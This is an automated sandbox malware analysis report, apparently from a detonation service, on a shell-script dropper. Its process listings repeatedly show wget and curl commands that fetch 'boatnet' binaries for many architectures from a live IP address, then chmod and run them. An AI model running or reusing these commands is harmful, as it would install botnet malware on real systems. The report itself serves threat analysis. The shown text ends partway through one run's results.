Malware Analysis Report

2025-04-03 19:17

Sample ID 241029-c8lgba1ldl
Target 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
SHA256 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

Threat Level: Shows suspicious behavior

The file 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:44

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

debian9-mipsel-20240611-en

Max time kernel

49s

Max time network

52s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

28s

Max time network

131s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.166:3000 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.7:443 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp
US 154.216.19.166:3000 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:48

Platform

debian9-armhf-20240611-en

Max time kernel

24s

Max time network

51s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
